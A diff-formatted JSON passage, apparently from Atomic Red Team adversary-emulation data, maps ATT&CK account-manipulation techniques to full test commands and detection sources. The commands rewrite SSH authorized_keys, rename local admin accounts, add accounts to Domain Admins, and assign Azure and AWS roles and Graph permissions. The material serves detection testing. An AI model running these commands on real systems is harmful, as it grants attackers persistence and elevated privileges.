{ + "technique_id": "T1098.004", + "command_list": [ + "if [ -f ~/.ssh/authorized_keys ]; then ssh_authorized_keys=$(cat ~/.ssh/authorized_keys); echo $ssh_authorized_keys > ~/.ssh/authorized_keys; fi;\n" + ], + "commands": [ + { + "command": "if [ -f ~/.ssh/authorized_keys ]; then ssh_authorized_keys=$(cat ~/.ssh/authorized_keys); echo $ssh_authorized_keys > ~/.ssh/authorized_keys; fi;\n", + "source": "atomics/T1098.004/T1098.004.yaml", + "name": "Atomic Red Team Test - SSH Authorized Keys" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1098.004", + "display_name": "SSH Authorized Keys", + "atomic_tests": [ + { + "name": "Modify SSH Authorized Keys", + "auto_generated_guid": "342cc723-127c-4d3a-8292-9c0c6b4ecadc", + "description": "Modify contents of /.ssh/authorized_keys to maintain persistence on victim host. \nIf the user is able to save the same contents in the authorized_keys file, it shows user can modify the file.\n", + "supported_platforms": [ + "macos", + "linux" + ], + "executor": { + "name": "bash", + "elevation_required": false, + "command": "if [ -f ~/.ssh/authorized_keys ]; then ssh_authorized_keys=$(cat ~/.ssh/authorized_keys); echo $ssh_authorized_keys > ~/.ssh/authorized_keys; fi;\n", + "cleanup_command": "unset ssh_authorized_keys\n" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ] + ] + }, + { + "technique_id": "T1098", + "command_list": [ + "$x = Get-Random -Minimum 2 -Maximum 9999\n$y = Get-Random -Minimum 2 -Maximum 9999\n$z = Get-Random -Minimum 2 -Maximum 9999\n$w = Get-Random -Minimum 2 -Maximum 9999\nWrite-Host HaHa_$x$y$z\n\n$fmm = Get-LocalGroupMember -Group Administrators |?{ $_.ObjectClass -match \"User\" -and $_.PrincipalSource -match \"Local\"} | Select Name\n\nforeach($member in $fmm) {\n if($member -like \"*Administrator*\") {\n $account = $member.Name -replace \".+\\\\\\\",\"\" # strip computername\\\n $originalDescription = (Get-LocalUser -Name $account).Description\n Set-LocalUser -Name $account -Description \"atr:$account;$originalDescription\".Substring(0,48) # Keep original name in description\n Rename-LocalUser -Name $account -NewName \"HaHa_$x$y$z\" # Required due to length limitation\n Write-Host \"Successfully Renamed $account Account on \" $Env:COMPUTERNAME\n }\n }\n", + "$x = Get-Random -Minimum 2 -Maximum 99\n$y = Get-Random -Minimum 2 -Maximum 99\n$z = Get-Random -Minimum 2 -Maximum 99\n$w = Get-Random -Minimum 2 -Maximum 99\n\nImport-Module ActiveDirectory\n$account = \"atr--$x$y$z\"\nNew-ADUser -Name $account -GivenName \"Test\" -DisplayName $account -SamAccountName $account -Surname $account -Enabled:$False #{create_args}\nAdd-ADGroupMember \"#{group}\" $account\n", + "$x = Get-Random -Minimum 2 -Maximum 99\n$y = Get-Random -Minimum 2 -Maximum 99\n$z = Get-Random -Minimum 2 -Maximum 99\n$w = Get-Random -Minimum 2 -Maximum 99\n\nImport-Module ActiveDirectory\n$account = \"#{account_prefix}-$x$y$z\"\nNew-ADUser -Name $account -GivenName \"Test\" -DisplayName $account -SamAccountName $account -Surname $account -Enabled:$False #{create_args}\nAdd-ADGroupMember \"Domain Admins\" $account\n", + "$x = Get-Random -Minimum 2 -Maximum 99\n$y = Get-Random -Minimum 2 -Maximum 99\n$z = Get-Random -Minimum 2 -Maximum 99\n$w = Get-Random -Minimum 2 -Maximum 99\n\nImport-Module ActiveDirectory\n$account = \"#{account_prefix}-$x$y$z\"\nNew-ADUser -Name $account -GivenName \"Test\" -DisplayName $account -SamAccountName $account -Surname $account -Enabled:$False \nAdd-ADGroupMember \"#{group}\" $account\n", + "aws iam create-group --group-name atomicredteam\naws iam add-user-to-group --user-name atomicredteam --group-name atomicredteam\n", + "Import-Module -Name AzureAD\n$PWord = ConvertTo-SecureString -String \"#{password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"jonh@contoso.com\", $Pword\nConnect-AzureAD -Credential $Credential\n\n$user = Get-AzureADUser | where-object {$_.DisplayName -eq \"#{user_principal_name}\"}\nif ($user -eq $null) { Write-Warning \"User not found\"; exit }\n$role = Get-AzureADDirectoryRole | where-object {$_.DisplayName -eq \"#{role_name}\"}\nif ($role -eq $null) { Write-Warning \"Role not found\"; exit }\nAdd-AzureADDirectoryRoleMember -ObjectId $role.ObjectId -RefObjectId $user.ObjectId\nWrite-Host \"User $($user.DisplayName) was added to $($role.DisplayName) role\"\n", + "Import-Module -Name AzureAD\n$PWord = ConvertTo-SecureString -String \"p4sswd\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"#{username}\", $Pword\nConnect-AzureAD -Credential $Credential\n\n$user = Get-AzureADUser | where-object {$_.DisplayName -eq \"#{user_principal_name}\"}\nif ($user -eq $null) { Write-Warning \"User not found\"; exit }\n$role = Get-AzureADDirectoryRole | where-object {$_.DisplayName -eq \"#{role_name}\"}\nif ($role -eq $null) { Write-Warning \"Role not found\"; exit }\nAdd-AzureADDirectoryRoleMember -ObjectId $role.ObjectId -RefObjectId $user.ObjectId\nWrite-Host \"User $($user.DisplayName) was added to $($role.DisplayName) role\"\n", + "Import-Module -Name AzureAD\n$PWord = ConvertTo-SecureString -String \"#{password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"#{username}\", $Pword\nConnect-AzureAD -Credential $Credential\n\n$user = Get-AzureADUser | where-object {$_.DisplayName -eq \"SuperUser\"}\nif ($user -eq $null) { Write-Warning \"User not found\"; exit }\n$role = Get-AzureADDirectoryRole | where-object {$_.DisplayName -eq \"#{role_name}\"}\nif ($role -eq $null) { Write-Warning \"Role not found\"; exit }\nAdd-AzureADDirectoryRoleMember -ObjectId $role.ObjectId -RefObjectId $user.ObjectId\nWrite-Host \"User $($user.DisplayName) was added to $($role.DisplayName) role\"\n", + "Import-Module -Name AzureAD\n$PWord = ConvertTo-SecureString -String \"#{password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"#{username}\", $Pword\nConnect-AzureAD -Credential $Credential\n\n$user = Get-AzureADUser | where-object {$_.DisplayName -eq \"#{user_principal_name}\"}\nif ($user -eq $null) { Write-Warning \"User not found\"; exit }\n$role = Get-AzureADDirectoryRole | where-object {$_.DisplayName -eq \"Global Reader\"}\nif ($role -eq $null) { Write-Warning \"Role not found\"; exit }\nAdd-AzureADDirectoryRoleMember -ObjectId $role.ObjectId -RefObjectId $user.ObjectId\nWrite-Host \"User $($user.DisplayName) was added to $($role.DisplayName) role\"\n", + "Import-Module -Name AzureAD\n$PWord = ConvertTo-SecureString -String \"#{password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"jonh@contoso.com\", $Pword\nConnect-AzureAD -Credential $Credential\n\n$sp = Get-AzureADServicePrincipal | where-object {$_.DisplayName -eq \"#{service_principal_name}\"}\nif ($sp -eq $null) { Write-Warning \"Service Principal not found\"; exit }\n$role = Get-AzureADDirectoryRole | where-object {$_.DisplayName -eq \"#{role_name}\"}\nif ($role -eq $null) { Write-Warning \"Role not found\"; exit }\nAdd-AzureADDirectoryRoleMember -ObjectId $role.ObjectId -RefObjectId $sp.ObjectId\nWrite-Host \"Service Principal $($sp.DisplayName) was added to $($role.DisplayName)\"\n", + "Import-Module -Name AzureAD\n$PWord = ConvertTo-SecureString -String \"p4sswd\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"#{username}\", $Pword\nConnect-AzureAD -Credential $Credential\n\n$sp = Get-AzureADServicePrincipal | where-object {$_.DisplayName -eq \"#{service_principal_name}\"}\nif ($sp -eq $null) { Write-Warning \"Service Principal not found\"; exit }\n$role = Get-AzureADDirectoryRole | where-object {$_.DisplayName -eq \"#{role_name}\"}\nif ($role -eq $null) { Write-Warning \"Role not found\"; exit }\nAdd-AzureADDirectoryRoleMember -ObjectId $role.ObjectId -RefObjectId $sp.ObjectId\nWrite-Host \"Service Principal $($sp.DisplayName) was added to $($role.DisplayName)\"\n", + "Import-Module -Name AzureAD\n$PWord = ConvertTo-SecureString -String \"#{password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"#{username}\", $Pword\nConnect-AzureAD -Credential $Credential\n\n$sp = Get-AzureADServicePrincipal | where-object {$_.DisplayName -eq \"SuperSP\"}\nif ($sp -eq $null) { Write-Warning \"Service Principal not found\"; exit }\n$role = Get-AzureADDirectoryRole | where-object {$_.DisplayName -eq \"#{role_name}\"}\nif ($role -eq $null) { Write-Warning \"Role not found\"; exit }\nAdd-AzureADDirectoryRoleMember -ObjectId $role.ObjectId -RefObjectId $sp.ObjectId\nWrite-Host \"Service Principal $($sp.DisplayName) was added to $($role.DisplayName)\"\n", + "Import-Module -Name AzureAD\n$PWord = ConvertTo-SecureString -String \"#{password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"#{username}\", $Pword\nConnect-AzureAD -Credential $Credential\n\n$sp = Get-AzureADServicePrincipal | where-object {$_.DisplayName -eq \"#{service_principal_name}\"}\nif ($sp -eq $null) { Write-Warning \"Service Principal not found\"; exit }\n$role = Get-AzureADDirectoryRole | where-object {$_.DisplayName -eq \"Global Reader\"}\nif ($role -eq $null) { Write-Warning \"Role not found\"; exit }\nAdd-AzureADDirectoryRoleMember -ObjectId $role.ObjectId -RefObjectId $sp.ObjectId\nWrite-Host \"Service Principal $($sp.DisplayName) was added to $($role.DisplayName)\"\n", + "Import-Module -Name Az.Resources\n$PWord = ConvertTo-SecureString -String \"#{password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"jonh@contoso.com\", $Pword\nConnect-AzAccount -Credential $Credential\n\n$user = Get-AzADUser | where-object {$_.DisplayName -eq \"#{user_principal_name}\"}\nif ($user -eq $null) { Write-Warning \"User not found\"; exit }\n$subscription = Get-AzSubscription | where-object {$_.Name -eq \"#{subscription}\"}\nif ($subscription -eq $null) { Write-Warning \"Subscription not found\"; exit }\n$role = Get-AzRoleDefinition | where-object {$_.Name -eq \"#{role_name}\"}\nif ($role -eq $null) { Write-Warning \"Role not found\"; exit }\n\nNew-AzRoleAssignment -ObjectId $user.id -RoleDefinitionId $role.id -Scope /subscriptions/$subscription\nWrite-Host \"User $($user.DisplayName) was added to $($role.Name) role in subscriptions $($subscriptions.Name)\"\n", + "Import-Module -Name Az.Resources\n$PWord = ConvertTo-SecureString -String \"p4sswd\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"#{username}\", $Pword\nConnect-AzAccount -Credential $Credential\n\n$user = Get-AzADUser | where-object {$_.DisplayName -eq \"#{user_principal_name}\"}\nif ($user -eq $null) { Write-Warning \"User not found\"; exit }\n$subscription = Get-AzSubscription | where-object {$_.Name -eq \"#{subscription}\"}\nif ($subscription -eq $null) { Write-Warning \"Subscription not found\"; exit }\n$role = Get-AzRoleDefinition | where-object {$_.Name -eq \"#{role_name}\"}\nif ($role -eq $null) { Write-Warning \"Role not found\"; exit }\n\nNew-AzRoleAssignment -ObjectId $user.id -RoleDefinitionId $role.id -Scope /subscriptions/$subscription\nWrite-Host \"User $($user.DisplayName) was added to $($role.Name) role in subscriptions $($subscriptions.Name)\"\n", + "Import-Module -Name Az.Resources\n$PWord = ConvertTo-SecureString -String \"#{password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"#{username}\", $Pword\nConnect-AzAccount -Credential $Credential\n\n$user = Get-AzADUser | where-object {$_.DisplayName -eq \"SuperUser\"}\nif ($user -eq $null) { Write-Warning \"User not found\"; exit }\n$subscription = Get-AzSubscription | where-object {$_.Name -eq \"#{subscription}\"}\nif ($subscription -eq $null) { Write-Warning \"Subscription not found\"; exit }\n$role = Get-AzRoleDefinition | where-object {$_.Name -eq \"#{role_name}\"}\nif ($role -eq $null) { Write-Warning \"Role not found\"; exit }\n\nNew-AzRoleAssignment -ObjectId $user.id -RoleDefinitionId $role.id -Scope /subscriptions/$subscription\nWrite-Host \"User $($user.DisplayName) was added to $($role.Name) role in subscriptions $($subscriptions.Name)\"\n", + "Import-Module -Name Az.Resources\n$PWord = ConvertTo-SecureString -String \"#{password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"#{username}\", $Pword\nConnect-AzAccount -Credential $Credential\n\n$user = Get-AzADUser | where-object {$_.DisplayName -eq \"#{user_principal_name}\"}\nif ($user -eq $null) { Write-Warning \"User not found\"; exit }\n$subscription = Get-AzSubscription | where-object {$_.Name -eq \"#{subscription}\"}\nif ($subscription -eq $null) { Write-Warning \"Subscription not found\"; exit }\n$role = Get-AzRoleDefinition | where-object {$_.Name -eq \"Reader\"}\nif ($role -eq $null) { Write-Warning \"Role not found\"; exit }\n\nNew-AzRoleAssignment -ObjectId $user.id -RoleDefinitionId $role.id -Scope /subscriptions/$subscription\nWrite-Host \"User $($user.DisplayName) was added to $($role.Name) role in subscriptions $($subscriptions.Name)\"\n", + "Import-Module -Name Az.Resources\n$PWord = ConvertTo-SecureString -String \"#{password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"#{username}\", $Pword\nConnect-AzAccount -Credential $Credential\n\n$user = Get-AzADUser | where-object {$_.DisplayName -eq \"#{user_principal_name}\"}\nif ($user -eq $null) { Write-Warning \"User not found\"; exit }\n$subscription = Get-AzSubscription | where-object {$_.Name -eq \"Azure subscription 1\"}\nif ($subscription -eq $null) { Write-Warning \"Subscription not found\"; exit }\n$role = Get-AzRoleDefinition | where-object {$_.Name -eq \"#{role_name}\"}\nif ($role -eq $null) { Write-Warning \"Role not found\"; exit }\n\nNew-AzRoleAssignment -ObjectId $user.id -RoleDefinitionId $role.id -Scope /subscriptions/$subscription\nWrite-Host \"User $($user.DisplayName) was added to $($role.Name) role in subscriptions $($subscriptions.Name)\"\n", + "Import-Module -Name Az.Resources\n$PWord = ConvertTo-SecureString -String \"#{password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"jonh@contoso.com\", $Pword\nConnect-AzAccount -Credential $Credential\n\n$sp = Get-AzADServicePrincipal | where-object {$_.DisplayName -eq \"#{service_principal_name}\"}\nif ($sp -eq $null) { Write-Warning \"Service Principal not found\"; exit }\n$subscription = Get-AzSubscription | where-object {$_.Name -eq \"#{subscription}\"} \nif ($subscription -eq $null) { Write-Warning \"Subscription not found\"; exit }\n$role = Get-AzRoleDefinition | where-object {$_.Name -eq \"#{role_name}\"}\nif ($role -eq $null) { Write-Warning \"Role not found\"; exit }\n\nNew-AzRoleAssignment -ObjectId $sp.id -RoleDefinitionId $role.id -Scope /subscriptions/$subscription\nWrite-Host \"Service Principal $($sp.DisplayName) was added to $($role.Name) role in subscriptions $($subscriptions.Name)\"\n", + "Import-Module -Name Az.Resources\n$PWord = ConvertTo-SecureString -String \"p4sswd\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"#{username}\", $Pword\nConnect-AzAccount -Credential $Credential\n\n$sp = Get-AzADServicePrincipal | where-object {$_.DisplayName -eq \"#{service_principal_name}\"}\nif ($sp -eq $null) { Write-Warning \"Service Principal not found\"; exit }\n$subscription = Get-AzSubscription | where-object {$_.Name -eq \"#{subscription}\"} \nif ($subscription -eq $null) { Write-Warning \"Subscription not found\"; exit }\n$role = Get-AzRoleDefinition | where-object {$_.Name -eq \"#{role_name}\"}\nif ($role -eq $null) { Write-Warning \"Role not found\"; exit }\n\nNew-AzRoleAssignment -ObjectId $sp.id -RoleDefinitionId $role.id -Scope /subscriptions/$subscription\nWrite-Host \"Service Principal $($sp.DisplayName) was added to $($role.Name) role in subscriptions $($subscriptions.Name)\"\n", + "Import-Module -Name Az.Resources\n$PWord = ConvertTo-SecureString -String \"#{password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"#{username}\", $Pword\nConnect-AzAccount -Credential $Credential\n\n$sp = Get-AzADServicePrincipal | where-object {$_.DisplayName -eq \"SuperSP\"}\nif ($sp -eq $null) { Write-Warning \"Service Principal not found\"; exit }\n$subscription = Get-AzSubscription | where-object {$_.Name -eq \"#{subscription}\"} \nif ($subscription -eq $null) { Write-Warning \"Subscription not found\"; exit }\n$role = Get-AzRoleDefinition | where-object {$_.Name -eq \"#{role_name}\"}\nif ($role -eq $null) { Write-Warning \"Role not found\"; exit }\n\nNew-AzRoleAssignment -ObjectId $sp.id -RoleDefinitionId $role.id -Scope /subscriptions/$subscription\nWrite-Host \"Service Principal $($sp.DisplayName) was added to $($role.Name) role in subscriptions $($subscriptions.Name)\"\n", + "Import-Module -Name Az.Resources\n$PWord = ConvertTo-SecureString -String \"#{password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"#{username}\", $Pword\nConnect-AzAccount -Credential $Credential\n\n$sp = Get-AzADServicePrincipal | where-object {$_.DisplayName -eq \"#{service_principal_name}\"}\nif ($sp -eq $null) { Write-Warning \"Service Principal not found\"; exit }\n$subscription = Get-AzSubscription | where-object {$_.Name -eq \"#{subscription}\"} \nif ($subscription -eq $null) { Write-Warning \"Subscription not found\"; exit }\n$role = Get-AzRoleDefinition | where-object {$_.Name -eq \"Reader\"}\nif ($role -eq $null) { Write-Warning \"Role not found\"; exit }\n\nNew-AzRoleAssignment -ObjectId $sp.id -RoleDefinitionId $role.id -Scope /subscriptions/$subscription\nWrite-Host \"Service Principal $($sp.DisplayName) was added to $($role.Name) role in subscriptions $($subscriptions.Name)\"\n", + "Import-Module -Name Az.Resources\n$PWord = ConvertTo-SecureString -String \"#{password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"#{username}\", $Pword\nConnect-AzAccount -Credential $Credential\n\n$sp = Get-AzADServicePrincipal | where-object {$_.DisplayName -eq \"#{service_principal_name}\"}\nif ($sp -eq $null) { Write-Warning \"Service Principal not found\"; exit }\n$subscription = Get-AzSubscription | where-object {$_.Name -eq \"Azure subscription 1\"} \nif ($subscription -eq $null) { Write-Warning \"Subscription not found\"; exit }\n$role = Get-AzRoleDefinition | where-object {$_.Name -eq \"#{role_name}\"}\nif ($role -eq $null) { Write-Warning \"Role not found\"; exit }\n\nNew-AzRoleAssignment -ObjectId $sp.id -RoleDefinitionId $role.id -Scope /subscriptions/$subscription\nWrite-Host \"Service Principal $($sp.DisplayName) was added to $($role.Name) role in subscriptions $($subscriptions.Name)\"\n", + "Import-Module -Name AzureAD\n$PWord = ConvertTo-SecureString -String \"#{password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"jonh@contoso.com\", $Pword\nConnect-AzureAD -Credential $Credential\n\n$aadApplication = New-AzureADApplication -DisplayName \"#{application_name}\"\n$servicePrincipal = New-AzureADServicePrincipal -AppId $aadApplication.AppId\n#$aadApplication = Get-AzureADApplication | Where-Object {$_.DisplayName -eq \"#{application_name}\"}\n\n#Get Service Principal of Microsoft Graph Resource API \n$graphSP = Get-AzureADServicePrincipal -All $true | Where-Object {$_.DisplayName -eq \"Microsoft Graph\"}\n\n#Initialize RequiredResourceAccess for Microsoft Graph Resource API \n$requiredGraphAccess = New-Object Microsoft.Open.AzureAD.Model.RequiredResourceAccess\n$requiredGraphAccess.ResourceAppId = $graphSP.AppId\n$requiredGraphAccess.ResourceAccess = New-Object System.Collections.Generic.List[Microsoft.Open.AzureAD.Model.ResourceAccess]\n\n#Set Application Permissions\n$ApplicationPermissions = @('#{application_permission}')\n\n$reqPermission = $graphSP.AppRoles | Where-Object {$_.Value -eq $ApplicationPermissions}\nif($reqPermission)\n{\n$resourceAccess = New-Object Microsoft.Open.AzureAD.Model.ResourceAccess\n$resourceAccess.Type = \"Role\"\n$resourceAccess.Id = $reqPermission.Id \n#Add required app permission\n$requiredGraphAccess.ResourceAccess.Add($resourceAccess)\n}\nelse\n{\nWrite-Host \"App permission $permission not found in the Graph Resource API\" -ForegroundColor Red\n}\n\n#Add required resource accesses\n$requiredResourcesAccess = New-Object System.Collections.Generic.List[Microsoft.Open.AzureAD.Model.RequiredResourceAccess]\n$requiredResourcesAccess.Add($requiredGraphAccess)\n\n#Set permissions in existing Azure AD App\nSet-AzureADApplication -ObjectId $aadApplication.ObjectId -RequiredResourceAccess $requiredResourcesAccess\n\n$servicePrincipal = Get-AzureADServicePrincipal -All $true | Where-Object {$_.AppId -eq $aadApplication.AppId}\n\nNew-AzureADServiceAppRoleAssignment -ObjectId $servicePrincipal.ObjectId -PrincipalId $servicePrincipal.ObjectId -ResourceId $graphSP.ObjectId -Id $reqPermission.Id\n", + "Import-Module -Name AzureAD\n$PWord = ConvertTo-SecureString -String \"p4sswd\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"#{username}\", $Pword\nConnect-AzureAD -Credential $Credential\n\n$aadApplication = New-AzureADApplication -DisplayName \"#{application_name}\"\n$servicePrincipal = New-AzureADServicePrincipal -AppId $aadApplication.AppId\n#$aadApplication = Get-AzureADApplication | Where-Object {$_.DisplayName -eq \"#{application_name}\"}\n\n#Get Service Principal of Microsoft Graph Resource API \n$graphSP = Get-AzureADServicePrincipal -All $true | Where-Object {$_.DisplayName -eq \"Microsoft Graph\"}\n\n#Initialize RequiredResourceAccess for Microsoft Graph Resource API \n$requiredGraphAccess = New-Object Microsoft.Open.AzureAD.Model.RequiredResourceAccess\n$requiredGraphAccess.ResourceAppId = $graphSP.AppId\n$requiredGraphAccess.ResourceAccess = New-Object System.Collections.Generic.List[Microsoft.Open.AzureAD.Model.ResourceAccess]\n\n#Set Application Permissions\n$ApplicationPermissions = @('#{application_permission}')\n\n$reqPermission = $graphSP.AppRoles | Where-Object {$_.Value -eq $ApplicationPermissions}\nif($reqPermission)\n{\n$resourceAccess = New-Object Microsoft.Open.AzureAD.Model.ResourceAccess\n$resourceAccess.Type = \"Role\"\n$resourceAccess.Id = $reqPermission.Id \n#Add required app permission\n$requiredGraphAccess.ResourceAccess.Add($resourceAccess)\n}\nelse\n{\nWrite-Host \"App permission $permission not found in the Graph Resource API\" -ForegroundColor Red\n}\n\n#Add required resource accesses\n$requiredResourcesAccess = New-Object System.Collections.Generic.List[Microsoft.Open.AzureAD.Model.RequiredResourceAccess]\n$requiredResourcesAccess.Add($requiredGraphAccess)\n\n#Set permissions in existing Azure AD App\nSet-AzureADApplication -ObjectId $aadApplication.ObjectId -RequiredResourceAccess $requiredResourcesAccess\n\n$servicePrincipal = Get-AzureADServicePrincipal -All $true | Where-Object {$_.AppId -eq $aadApplication.AppId}\n\nNew-AzureADServiceAppRoleAssignment -ObjectId $servicePrincipal.ObjectId -PrincipalId $servicePrincipal.ObjectId -ResourceId $graphSP.ObjectId -Id $reqPermission.Id\n", + "Import-Module -Name AzureAD\n$PWord = ConvertTo-SecureString -String \"#{password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"#{username}\", $Pword\nConnect-AzureAD -Credential $Credential\n\n$aadApplication = New-AzureADApplication -DisplayName \"test_app\"\n$servicePrincipal = New-AzureADServicePrincipal -AppId $aadApplication.AppId\n#$aadApplication = Get-AzureADApplication | Where-Object {$_.DisplayName -eq \"test_app\"}\n\n#Get Service Principal of Microsoft Graph Resource API \n$graphSP = Get-AzureADServicePrincipal -All $true | Where-Object {$_.DisplayName -eq \"Microsoft Graph\"}\n\n#Initialize RequiredResourceAccess for Microsoft Graph Resource API \n$requiredGraphAccess = New-Object Microsoft.Open.AzureAD.Model.RequiredResourceAccess\n$requiredGraphAccess.ResourceAppId = $graphSP.AppId\n$requiredGraphAccess.ResourceAccess = New-Object System.Collections.Generic.List[Microsoft.Open.AzureAD.Model.ResourceAccess]\n\n#Set Application Permissions\n$ApplicationPermissions = @('#{application_permission}')\n\n$reqPermission = $graphSP.AppRoles | Where-Object {$_.Value -eq $ApplicationPermissions}\nif($reqPermission)\n{\n$resourceAccess = New-Object Microsoft.Open.AzureAD.Model.ResourceAccess\n$resourceAccess.Type = \"Role\"\n$resourceAccess.Id = $reqPermission.Id \n#Add required app permission\n$requiredGraphAccess.ResourceAccess.Add($resourceAccess)\n}\nelse\n{\nWrite-Host \"App permission $permission not found in the Graph Resource API\" -ForegroundColor Red\n}\n\n#Add required resource accesses\n$requiredResourcesAccess = New-Object System.Collections.Generic.List[Microsoft.Open.AzureAD.Model.RequiredResourceAccess]\n$requiredResourcesAccess.Add($requiredGraphAccess)\n\n#Set permissions in existing Azure AD App\nSet-AzureADApplication -ObjectId $aadApplication.ObjectId -RequiredResourceAccess $requiredResourcesAccess\n\n$servicePrincipal = Get-AzureADServicePrincipal -All $true | Where-Object {$_.AppId -eq $aadApplication.AppId}\n\nNew-AzureADServiceAppRoleAssignment -ObjectId $servicePrincipal.ObjectId -PrincipalId $servicePrincipal.ObjectId -ResourceId $graphSP.ObjectId -Id $reqPermission.Id\n", + "Import-Module -Name AzureAD\n$PWord = ConvertTo-SecureString -String \"#{password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"#{username}\", $Pword\nConnect-AzureAD -Credential $Credential\n\n$aadApplication = New-AzureADApplication -DisplayName \"#{application_name}\"\n$servicePrincipal = New-AzureADServicePrincipal -AppId $aadApplication.AppId\n#$aadApplication = Get-AzureADApplication | Where-Object {$_.DisplayName -eq \"#{application_name}\"}\n\n#Get Service Principal of Microsoft Graph Resource API \n$graphSP = Get-AzureADServicePrincipal -All $true | Where-Object {$_.DisplayName -eq \"Microsoft Graph\"}\n\n#Initialize RequiredResourceAccess for Microsoft Graph Resource API \n$requiredGraphAccess = New-Object Microsoft.Open.AzureAD.Model.RequiredResourceAccess\n$requiredGraphAccess.ResourceAppId = $graphSP.AppId\n$requiredGraphAccess.ResourceAccess = New-Object System.Collections.Generic.List[Microsoft.Open.AzureAD.Model.ResourceAccess]\n\n#Set Application Permissions\n$ApplicationPermissions = @('DirectoryRecommendations.Read.All')\n\n$reqPermission = $graphSP.AppRoles | Where-Object {$_.Value -eq $ApplicationPermissions}\nif($reqPermission)\n{\n$resourceAccess = New-Object Microsoft.Open.AzureAD.Model.ResourceAccess\n$resourceAccess.Type = \"Role\"\n$resourceAccess.Id = $reqPermission.Id \n#Add required app permission\n$requiredGraphAccess.ResourceAccess.Add($resourceAccess)\n}\nelse\n{\nWrite-Host \"App permission $permission not found in the Graph Resource API\" -ForegroundColor Red\n}\n\n#Add required resource accesses\n$requiredResourcesAccess = New-Object 